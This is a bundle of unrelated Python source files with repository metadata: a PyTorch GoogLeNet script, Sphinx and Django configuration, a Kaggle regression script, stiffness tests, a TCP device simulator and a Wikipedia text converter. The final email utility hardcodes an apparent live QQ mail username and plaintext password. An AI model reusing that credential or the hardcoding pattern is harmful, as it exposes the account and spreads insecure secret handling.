x = self.block1(x)
if self.verbose:
print('block 1 output: {}'.format(x.shape))
x = self.block2(x)
if self.verbose:
print('block 2 output: {}'.format(x.shape))
x = self.block3(x)
if self.verbose:
print('block 3 output: {}'.format(x.shape))
x = self.block4(x)
if self.verbose:
print('block 4 output: {}'.format(x.shape))
x = self.block5(x)
if self.verbose:
print('block 5 output: {}'.format(x.shape))
x = x.view(x.shape[0], -1)
x = self.classifier(x)
return x
test_net = googlenet(3, 10, True)
test_x = Variable(torch.zeros(1, 3, 96, 96)) # (bs, n_c, n_h, n_w)
test_y = test_net(test_x)
print('output: {}'.format(test_y.shape))
# Data preprocessing
def data_tf(x):
x = x.resize((96, 96), 2)
x = np.array(x, dtype="float32") / 255
x = (x - 0.5) / 0.5
    x = x.transpose((2, 0, 1))  # put the channel dimension first
x = torch.from_numpy(x)
return x
# Apply the preprocessing to build the training and test loaders
train_set = CIFAR10(root="./datasets/", train=True, transform=data_tf)
train_data = torch.utils.data.DataLoader(
train_set, batch_size=64, shuffle=True)
test_set = CIFAR10(root="./datasets/", train=False, transform=data_tf)
test_data = torch.utils.data.DataLoader(
test_set, batch_size=128, shuffle=False)
# Define the optimizer and the loss function
net = googlenet(3, 10)
optimizer = torch.optim.SGD(net.parameters(), lr=0.01)
loss_func = nn.CrossEntropyLoss()
# Train the network
# train(net, train_data, test_data, 20, optimizer, loss_func)
|
[
"1217096231@qq.com"
] |
1217096231@qq.com
|
1d32e1151eba68baf6a8345f309bbe74e4e2f45e
|
3cb59da879c7865dd6ddb246b7ea92d5a71cb838
|
/documentation/book/src/conf.py
|
da1eca7ba63789d464e1cc8f1721a2ecc13e5f7b
|
[] |
no_license
|
iNarcissuss/Cuckoodroid-1
|
9110be112f45327ffe8a74b2216fe8ad6a153485
|
0170c52aa9536ffc5b8391190dec892c9bd7ba0b
|
refs/heads/master
| 2020-04-07T08:53:28.011215
| 2018-06-17T22:25:29
| 2018-06-17T22:30:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,078
|
py
|
# -*- coding: utf-8 -*-
#
# Cuckoo Sandbox documentation build configuration file.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'CuckooDroid'
copyright = u'2014-2015, Checkpoint Software Technologies'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "%s v%s Book" % (project, version)
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "_images/logo/cuckoo.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = False
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'CuckooSandboxdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'CuckooSandbox.tex', u'Cuckoo Sandbox Book',
u'Cuckoo Sandbox', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'cuckoosandbox', u'Cuckoo Sandbox Book',
[u'Cuckoo Sandbox'], 1)
]
|
[
"upgautam@ualr.edu"
] |
upgautam@ualr.edu
|
9e204b2a44c4a6faeafac15f08663c30bceeb24e
|
53784d3746eccb6d8fca540be9087a12f3713d1c
|
/res/packages/scripts/scripts/client/gui/prb_control/entities/random/squad/actions_handler.py
|
5f596563a646d6a33336b7a766a43818fd80f3e2
|
[] |
no_license
|
webiumsk/WOT-0.9.17.1-CT
|
736666d53cbd0da6745b970e90a8bac6ea80813d
|
d7c3cf340ae40318933e7205bf9a17c7e53bac52
|
refs/heads/master
| 2021-01-09T06:00:33.898009
| 2017-02-03T21:40:17
| 2017-02-03T21:40:17
| 80,870,824
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 3,310
|
py
|
# 2017.02.03 21:48:45 Central Europe (standard time)
# Embedded file name: scripts/client/gui/prb_control/entities/random/squad/actions_handler.py
from CurrentVehicle import g_currentVehicle
from constants import MIN_VEHICLE_LEVEL, MAX_VEHICLE_LEVEL
from gui import DialogsInterface
from gui.Scaleform.daapi.view.dialogs import I18nConfirmDialogMeta
from gui.prb_control.entities.base.squad.actions_handler import SquadActionsHandler
class RandomSquadActionsHandler(SquadActionsHandler):
"""
Random squad actions handler
"""
pass
class BalancedSquadActionsHandler(RandomSquadActionsHandler):
"""
Random balanced squad actions handler
"""
def execute(self):
if self._entity.isCommander():
func = self._entity
fullData = func.getUnitFullData(unitIdx=self._entity.getUnitIdx())
notReadyCount = 0
for slot in fullData.slotsIterator:
slotPlayer = slot.player
if slotPlayer:
if slotPlayer.isInArena() or fullData.playerInfo.isInSearch() or fullData.playerInfo.isInQueue():
DialogsInterface.showI18nInfoDialog('squadHavePlayersInBattle', lambda result: None)
return True
if not slotPlayer.isReady:
notReadyCount += 1
if not fullData.playerInfo.isReady:
notReadyCount -= 1
if fullData.stats.occupiedSlotsCount == 1:
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNoPlayers'), self._confirmCallback)
return True
if notReadyCount > 0:
if notReadyCount == 1:
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNotReadyPlayer'), self._confirmCallback)
return True
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNotReadyPlayers'), self._confirmCallback)
return True
if not g_currentVehicle.isLocked():
_, unit = self._entity.getUnit()
playerVehicles = unit.getVehicles()
if playerVehicles:
commanderLevel = g_currentVehicle.item.level
lowerBound, upperBound = self._entity.getSquadLevelBounds()
minLevel = max(MIN_VEHICLE_LEVEL, commanderLevel + lowerBound)
maxLevel = min(MAX_VEHICLE_LEVEL, commanderLevel + upperBound)
levelRange = range(minLevel, maxLevel + 1)
for _, unitVehicles in playerVehicles.iteritems():
for vehicle in unitVehicles:
if vehicle.vehLevel not in levelRange:
DialogsInterface.showDialog(I18nConfirmDialogMeta('squadHaveNoPlayers'), self._confirmCallback)
return True
self._setCreatorReady()
else:
self._entity.togglePlayerReadyAction(True)
return True
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\gui\prb_control\entities\random\squad\actions_handler.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:48:45 Central Europe (standard time)
|
[
"info@webium.sk"
] |
info@webium.sk
|
94f99e7b82a5ec22f9c330c1c3424c80ddffd340
|
68cf7c25bb614883c50d21e5051fbea8dbf18ccb
|
/ecommercejockey/premier/migrations/0004_premiermanufacturer_is_relevant.py
|
7fffb9a4c92c2468f267399e76f0273e040662dc
|
[
"MIT"
] |
permissive
|
anniethiessen/ecommerce-jockey
|
63bf5af6212a46742dee98d816d0bc2cdb411708
|
9268b72553845a4650cdfe7c88b398db3cf92258
|
refs/heads/master
| 2022-12-14T02:29:25.140796
| 2021-05-15T01:20:30
| 2021-05-15T01:20:30
| 211,400,595
| 1
| 1
|
MIT
| 2022-12-08T06:45:40
| 2019-09-27T20:57:19
|
Python
|
UTF-8
|
Python
| false
| false
| 420
|
py
|
# Generated by Django 2.2.5 on 2019-10-24 21:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('premier', '0003_premierproduct_vendor_part_number'),
]
operations = [
migrations.AddField(
model_name='premiermanufacturer',
name='is_relevant',
field=models.BooleanField(default=False),
),
]
|
[
"anniethiessen79@gmail.com"
] |
anniethiessen79@gmail.com
|
91ee91326e2c26dfbfda3d24dd84086ee64b226b
|
bfc25f1ad7bfe061b57cfab82aba9d0af1453491
|
/data/external/repositories/124701/kaggle-bike-sharing-demand-master/support_vector_regression.py
|
759c9ec148be5704e863f8be68bcb9bf1a95db7a
|
[
"MIT"
] |
permissive
|
Keesiu/meta-kaggle
|
77d134620ebce530d183467202cf45639d9c6ff2
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
refs/heads/master
| 2020-03-28T00:23:10.584151
| 2018-12-20T19:09:50
| 2018-12-20T19:09:50
| 147,406,338
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,644
|
py
|
# Kaggle Bike Sharing Demand
# Joey L. Maalouf
# Approach: Support Vector Regression
# -- import any necessary modules ----------------------------------------------
import csv
from sklearn.svm import SVR
# from sklearn.grid_search import GridSearchCV
# -- define our functions ------------------------------------------------------
def to_int(input):
try:
return int(input)
except TypeError:
return [int(input[0]), int(input[1])]
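# to_int relies on int() raising TypeError when handed a list: a single
# value converts directly, while an [hour, weather] pair falls through to
# the element-wise conversion.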
def read_data(filename, xy):
datalist = []
# read in the file
data = open(filename)
reader = csv.reader(data, delimiter=",")
for row in reader:
if (xy == "x"):
# store just the hour and weather
datalist.append([row[0][11:13], row[4]])
elif (xy == "y"):
# store just the count
datalist.append(row[11])
elif (xy == "xx"):
datalist.append(row[0])
return datalist[1:] if xy == "xx" else [to_int(i) for i in datalist[1:]]
# -- read in the data ----------------------------------------------------------
print("Let's start reading in the data...")
x_train = read_data("train.csv", "x")
y_train = read_data("train.csv", "y")
x_test = read_data("test.csv", "x")
print("Finished reading in the data!\n")
# -- fit regression model ------------------------------------------------------
print("Let's start instantiating our model...")
# parameters = \
# [
# {
# "kernel": ["rbf"],
# "C": [1e3, 1e2, 1e1],
# "gamma": [1e0, 1e-1, 1e-2, 1e-3]
# },
# {
# "kernel": ["poly"],
# "C": [1e3, 1e2, 1e1],
# "gamma": [1e0, 1e-1, 1e-2, 1e-3],
# "degree": [2, 3, 4]
# }
# ]
# svr = GridSearchCV(SVR(), parameters)
svr = SVR(kernel="rbf", C=1000, gamma=0.1)
print("Finished instantiating our model!\n")
print("Let's start training our model...")
model = svr.fit(x_train, y_train)
print("Finished training our model!\n")
print("Let's start predicting our new data...")
y_test = model.predict(x_test)
print("Finished predicting our new data!\n")
# print("\nBest estimator:")
# print(svr.best_estimator_)
# print("\nBest parameters:")
# print(svr.best_params_)
# print("\nScorer:")
# print(svr.scorer_)
# print("\nGrid scores:")
# for s in svr.grid_scores_:
# print(s)
# -- output the results --------------------------------------------------------
datetime = read_data("test.csv", "xx")
with open("predicted_output_sv.csv", "w") as output:
output.write("datetime,count\n")
for i in range(len(y_test)):
output.write("%s,%d\n" % (datetime[i], y_test[i]))
|
[
"keesiu.wong@gmail.com"
] |
keesiu.wong@gmail.com
|
6b6a068af11269018cfc37811340df981f155484
|
760c354ab910fb9ad5f1ea44221e1dc724f1108b
|
/tests/test_extrusion_stiffness.py
|
8b49218dfee3067009ce6ae4e0e2c5320fc400a6
|
[
"MIT"
] |
permissive
|
yijiangh/assembly_instances
|
dabeafc7c5fc8b8b2b9ce7003ab493ad0f421db8
|
b97a4924d9998b64815c692cada85f4f595e023f
|
refs/heads/master
| 2021-06-13T13:27:27.579912
| 2020-01-30T02:40:51
| 2020-01-30T02:40:51
| 174,738,145
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,286
|
py
|
import os
import pytest
import numpy as np
from pyconmech import StiffnessChecker
@pytest.fixture
def stiffness_tol():
trans_tol = 0.0015
rot_tol = 5 * np.pi / 180
return trans_tol, rot_tol
@pytest.fixture
def known_failure():
return ['klein_bottle_trail.json', 'rotated_dented_cube.json']
def create_stiffness_checker(extrusion_path, trans_tol=0.0015, rot_tol=5*np.pi/180, verbose=False):
# TODO: the stiffness checker likely has a memory leak
if not os.path.exists(extrusion_path):
raise FileNotFoundError(extrusion_path)
checker = StiffnessChecker(json_file_path=extrusion_path, verbose=verbose)
checker.set_self_weight_load(True)
checker.set_nodal_displacement_tol(trans_tol=trans_tol, rot_tol=rot_tol)
return checker
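# Each fixture problem is solved under self-weight load only; the check then
# passes when the maximum nodal translation and rotation stay within the
# tolerances configured above.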
def test_extrusion_stiffness(extrusion_dir, extrusion_problem, stiffness_tol, known_failure):
p = os.path.join(extrusion_dir, extrusion_problem)
checker = create_stiffness_checker(p, trans_tol=stiffness_tol[0], rot_tol=stiffness_tol[1], verbose=False)
is_stiff = checker.solve()
success, nodal_displacement, fixities_reaction, element_reaction = checker.get_solved_results()
assert is_stiff == success
trans_tol, rot_tol = checker.get_nodal_deformation_tol()
max_trans, max_rot, max_trans_vid, max_rot_vid = checker.get_max_nodal_deformation()
compliance = checker.get_compliance()
    assert compliance > 0, 'Compliance must be greater than zero (no matter how small the value is); a non-positive value most likely means something is wrong with the material / cross-sectional properties. Does the model have cross section area and Jx, Ix, Iy, Iz values (consistent with the radius)?'
if not success:
print('\n' + '='*6)
print('Test stiffness on problem: {}'.format(p))
# The inverse of stiffness is flexibility or compliance
print('Stiff: {} | Compliance: {}'.format(is_stiff, compliance))
print('Max translation deformation: {0:.5f} / {1:.5} = {2:.5}, at node #{3}'.format(
max_trans, trans_tol, max_trans / trans_tol, max_trans_vid))
print('Max rotation deformation: {0:.5f} / {1:.5} = {2:.5}, at node #{3}'.format(
max_rot, rot_tol, max_rot / rot_tol, max_rot_vid))
if extrusion_problem not in known_failure:
assert success
|
[
"yijiangh@mit.edu"
] |
yijiangh@mit.edu
|
5b641a6aa3fe121f56f85194dd5c3617d7814729
|
e2220b78a968d8bff21061bdf67b027d933bb2be
|
/rentoMojo/rentoMojo/asgi.py
|
5399867dc8911d3da9c3bd8daa85d9e095910552
|
[] |
no_license
|
amannvl/rentoMojo
|
eab2ed103ed32e9e81424093571019160d9c49c0
|
0f4f0076f00ccd7178f42dee0081ee0d58027874
|
refs/heads/master
| 2023-03-08T10:24:44.339962
| 2021-02-20T09:48:30
| 2021-02-20T09:48:30
| 340,601,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for rentoMojo project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rentoMojo.settings')
application = get_asgi_application()
|
[
"Your-Email"
] |
Your-Email
|
d7eaedaf350f3b86d019a17c881535f17a757277
|
7b1de4a2607e3125b719c499a05bf6e2d3ec532d
|
/design_patterns/Command/ex2/actions.py
|
12e98f5164f5d62f49fffacf1ac797ab96234447
|
[] |
no_license
|
ganqzz/sandbox_py
|
61345ac7bddb09081e02decb78507daa3030c1e8
|
cc9e1ecca2ca99f350a3e2c3f51bbdb5eabc60e1
|
refs/heads/master
| 2022-12-01T21:54:38.461718
| 2021-09-04T03:47:14
| 2021-09-04T03:47:14
| 125,375,767
| 0
| 1
| null | 2023-04-16T00:55:51
| 2018-03-15T14:00:47
|
Python
|
UTF-8
|
Python
| false
| false
| 599
|
py
|
# Receiver classes
class Appliance(object):
def __init__(self, name):
self._name = name
def on(self):
print('%s has been turned on.' % self._name)
def off(self):
print('%s has been turned off.' % self._name)
class Door(object):
def __init__(self, name):
self.name = name
def lock(self):
print("%s is locked." % self.name)
def unlock(self):
print("%s is unlocked." % self.name)
class Security(object):
def arm(self):
print('Security system armed')
def disarm(self):
print('Security disarmed')
|
[
"ganqzz@users.noreply.github.com"
] |
ganqzz@users.noreply.github.com
|
41a9e2c99011225acf96d6969a1bfc6ac8265ef4
|
837c1bd7e021f071fbee78e2e4c7c27695ff62db
|
/meiduo_lianxi/apps/areas/migrations/0001_initial.py
|
9296f6f3a0d7380538a93604e5129fed0e6b4aa4
|
[
"MIT"
] |
permissive
|
Wang-TaoTao/lianxiku
|
0ae87b3db98e9f869a2a9901c24da80ccb63fe6f
|
0f58b6859b4dcd4e81d8f7c4f67be68f245811cc
|
refs/heads/master
| 2020-07-06T01:21:59.869064
| 2019-09-16T16:05:24
| 2019-09-16T16:05:24
| 202,844,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-08-23 09:00
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20, verbose_name='name')),
                ('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='subs', to='areas.Area', verbose_name='parent administrative region')),
            ],
            options={
                'verbose_name': 'province/city/district',
                'db_table': 'tb_areas',
                'verbose_name_plural': 'province/city/district',
            },
},
),
]
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
47f5d95e1f02be15883f5396f1c1136658fc91af
|
8660f77e77948f7646e2f0e4e46b46c0c7b318c5
|
/examples/ps-simulator.py
|
1e61d5fc5c05526a910c34ea8942a6492baf3424
|
[] |
no_license
|
ajoubertza/icalepcs-workshop
|
b6c227c4e6f79181222c40a9c505d3c41a8d068f
|
06ff925fe4724a71c17bbd193e3387884a919e51
|
refs/heads/gh-pages
| 2020-08-03T09:28:09.959380
| 2019-10-06T01:04:06
| 2019-10-06T01:04:06
| 211,702,036
| 1
| 1
| null | 2019-10-05T16:28:27
| 2019-09-29T17:45:48
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,665
|
py
|
#!/usr/bin/env python3
import time
import random
import logging
import gevent.server
DEFAULT_BIND = ''
DEFAULT_PORT = 45000
class Attr:
def __init__(self, *, initial_value=0.,
encode=lambda x: bytes(str(x), 'ascii'),
decode=float):
self.value = initial_value
self.encode = encode
self.decode = decode
def get(self):
return self.encode(self.value)
def set(self, value):
self.value = self.decode(value)
class Calibrate(Attr):
def set(self, value):
self.ts = time.time()
super().set(value)
class State(Attr):
def __init__(self, calib, *args, **kwargs):
kwargs['initial_value'] = 0
kwargs['decode'] = int
super().__init__(*args, **kwargs)
self.calib = calib
calib.ts = 0
def get(self):
self.value = 0
if time.time() - self.calib.ts < 2:
self.value = 1
return super().get()
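# State reads back 1 (calibrating) for two seconds after any write to
# 'calib' and 0 (idle) otherwise, so clients can poll 'stat?' to watch a
# simulated calibration finish.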
class PSSimulator(gevent.server.StreamServer):
class Error(Exception):
pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.log = logging.getLogger(f'simulator.{self.server_port}')
calib = Calibrate(initial_value=0)
self.attrs = {
b'stat': State(calib),
b'vol': Attr(initial_value=0.1),
b'curr': Attr(initial_value=0.),
b'calib': calib,
}
def __getitem__(self, name):
return self.attrs[name].get()
def __setitem__(self, name, value):
self.attrs[name].set(value)
def handle(self, sock, addr):
log = self.log
log.info('new connection from %r', addr)
fileobj = sock.makefile(mode='rb')
while True:
request = fileobj.readline()
if not request:
log.info('disconnected %r', addr)
break
log.info('request %r', request)
reply = b'ERROR'
try:
reply = self.handle_request(request)
except PSSimulator.Error:
pass
except:
                log.exception('Unforeseen error')
gevent.sleep(1e-1)
sock.sendall(reply + b'\n')
            log.info('replied %r', reply)
fileobj.close()
def handle_request(self, request):
req_lower = request.strip().lower()
is_query = b'?' in req_lower
pars = req_lower.split()
name = pars[0]
if is_query:
name = name[:-1] # take out '?'
if is_query:
return self[name]
self[name] = pars[1]
return b'OK'
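# Wire protocol sketch (line based, one request per line):
#   b'vol?\n'     -> b'0.1\n'  query: the trailing '?' is stripped
#   b'vol 3.2\n'  -> b'OK\n'   write: second token parsed by the attr's decode
#   anything else -> b'ERROR\n'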
def main(number=1, bind=DEFAULT_BIND, port=DEFAULT_PORT, **kwargs):
servers = []
logging.info('starting simulator...')
for i in range(number):
address = bind, port+i
server = PSSimulator(address)
server.start()
servers.append(server)
        server.log.info('simulator listening on %r!', address)
try:
while True:
# gevent.joinall(servers)
gevent.sleep(1)
except KeyboardInterrupt:
logging.info('Ctrl-C pressed. Bailing out!')
for server in servers:
server.stop()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--port', type=int, default=DEFAULT_PORT)
parser.add_argument('--bind', default=DEFAULT_BIND)
parser.add_argument('--log-level', default='info')
parser.add_argument('--number', type=int, default=1)
args = parser.parse_args()
logging.basicConfig(level=args.log_level.upper())
main(**vars(args))
|
[
"coutinhotiago@gmail.com"
] |
coutinhotiago@gmail.com
|
4672862d3327093a2d281b7b1a5b7c8ee31255f7
|
fafbddf21e669a20e3329d85f8edb06fb03d5a82
|
/wp2txt2json_run.py
|
fd6589378173f0054d69a1acae25e2572e872c3d
|
[] |
no_license
|
quesada/runs-gensim
|
07e188ca971d9734989c1981f297f00d7813eedc
|
aae75cc3188b99bd571fe7bbef008ac94bf3918a
|
refs/heads/master
| 2020-06-05T00:46:10.856429
| 2011-09-01T19:14:35
| 2011-09-01T19:14:35
| 1,306,724
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,042
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
wp2txt2json.py
Created by Stephan Gabler on 2011-06-09.
Copyright (c) 2011 __MyCompanyName__. All rights reserved.
"""
from os import path
import codecs
import glob
import json
import os
import re
import sys
import time
import tools
def main(param_file=None):
# setup
p, base_path, output_dir = tools.setup(param_file)
logger = tools.get_logger('gensim', path.join(output_dir, "run.log"))
logger.info("running %s" % ' '.join(sys.argv))
# in test case
if param_file:
files = [path.join(base_path, p['wiki_txt'])]
else:
files = glob.glob(path.join(base_path, p['wiki_txt']) + '*.txt')
out = codecs.open(os.path.join(output_dir, 'wiki.json'), mode='w', encoding='utf-8')
    headline = re.compile(r'\[\[(.*)\]\]')
    level2 = re.compile(r'== (.*) ==')
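    # wp2txt output format: '[[Topic]]' lines start a new article, '== sub =='
    # lines start a subsection, and every other non-blank line is body text
    # collected under the current subsection ('desc' before the first one).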
t0 = time.time()
c = 0
res = {}
for file in files:
print 'work on: %s' % file
with codecs.open(file, encoding='utf-8') as f:
for line in f:
# ignore linebreaks
if line == '\n':
continue
# if headline found
if headline.search(line):
if len(res) > 0:
out.write(json.dumps(res, encoding='utf-8', ensure_ascii=False) + '\n')
topic = headline.search(line).groups()[0]
res = {topic: {}}
sub = None
elif level2.search(line):
sub = level2.search(line).groups()[0]
else:
if not sub:
res[topic].setdefault('desc', []).append(line.strip())
else:
res[topic].setdefault(sub, []).append(line.strip())
c += 1
print 'average execution time: %f' % ((time.time() - t0) / c)
out.write(json.dumps(res, encoding='utf-8', ensure_ascii=False) + '\n')
print time.time() - t0
if __name__ == '__main__':
main()
|
[
"stephan.gabler@gmail.com"
] |
stephan.gabler@gmail.com
|
4279424d2d636b5183bcdaca92e5e30219f6fbc4
|
0a9949a7dbe5f7d70028b22779b3821c62eb6510
|
/static/rice/tools.py
|
542ed77243cfdf7ef84167c7dd93f31ce1e57930
|
[] |
no_license
|
744996162/warehouse
|
ed34f251addb9438a783945b6eed5eabe18ef5a2
|
3efd299a59a0703a1a092c58a6f7dc2564b92e4d
|
refs/heads/master
| 2020-06-04T22:10:14.727156
| 2015-07-03T09:40:09
| 2015-07-03T09:40:09
| 35,603,929
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,322
|
py
|
# -*- coding: utf-8 -*-
__author__ = 'Administrator'
import os
import xlwt
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import datetime
from email.mime.image import MIMEImage
# import sys
# reload(sys)
# sys.setdefaultencoding('utf-8')
def getYestaday():
now_time = datetime.datetime.now()
yes_time = now_time + datetime.timedelta(days=-1)
return yes_time.strftime('%Y%m%d')
def excel_write(text_in="0128/result.txt",excel_out="0128/result0128.xls",table_name="sheet1"):
fr_in=open(text_in)
wbk=xlwt.Workbook(encoding='utf-8')
sheet=wbk.add_sheet(table_name,True)
for i,line in enumerate(fr_in.readlines()):
stringArr=line.strip().split("\t")
for j,str in enumerate(stringArr):
if j==6:
str=int(str)
sheet.write(i,j,str)
# print i,stringArr
export=excel_out
wbk.save(export)
return excel_out
def excel_write2(text_in1="0128/result.txt",text_in2="0128/error.txt",excel_out="0128/result0128.xls",table_name1="sheet1",table_name2="sheet2"):
fr_in1=open(text_in1)
fr_in2=open(text_in2)
wbk=xlwt.Workbook(encoding='utf-8')
sheet1=wbk.add_sheet(table_name1,True)
for i,line in enumerate(fr_in1.readlines()):
stringArr=line.strip().split("\t")
for j,str in enumerate(stringArr):
if j==6:
str=int(str)
sheet1.write(i,j,str)
sheet2=wbk.add_sheet(table_name2,True)
for i,line in enumerate(fr_in2.readlines()):
stringArr=line.strip().split("\t")
for j,str in enumerate(stringArr):
if j==6:
str=int(str)
sheet2.write(i,j,str)
export=excel_out
wbk.save(export)
return excel_out
def send_mail(to_list,sub,content):
    #############
    # to_list: recipient address
    # sub: mail subject
    # content: mail body
    ###############
    # mail server, user name, password and mailbox domain suffix
mail_host="smtp.qq.com"
mail_user="744996162"
mail_pass="a1b2c3e48517343"
mail_postfix="qq.com"
me=mail_user+"<"+mail_user+"@"+mail_postfix+">"
msg = MIMEText(content)
msg['Subject'] = sub
msg['From'] = me
msg['To'] = to_list
try:
s = smtplib.SMTP()
s.connect(mail_host)
s.login(mail_user,mail_pass)
s.sendmail(me, to_list, msg.as_string())
s.close()
return True
except Exception as e:
print(e)
return False
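# send_mail above sends a plain-text body; the variants below wrap the
# message in MIMEMultipart so that one file (send_mail2) or every file in a
# directory (send_mail_attach_dir) can be attached as
# application/octet-stream parts.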
def send_mail2(to_list,sub,content,attach_file="0128/result.txt"):
    #############
    # to_list: recipient address
    # sub: mail subject
    # content: mail body
    ###############
    # mail server, user name, password and mailbox domain suffix
mail_host="smtp.qq.com"
mail_user="744996162"
mail_pass="a1b2c3e48517343"
mail_postfix="qq.com"
me=mail_user+"<"+mail_user+"@"+mail_postfix+">"
msg=MIMEMultipart()
msg['Subject'] = sub
msg['From'] = me
msg['To'] = to_list
att = MIMEApplication(file(attach_file, 'rb').read())
att["Content-Type"] = 'application/octet-stream'
att.add_header('content-disposition','attachment',filename=attach_file)
msg.attach(att)
try:
s = smtplib.SMTP()
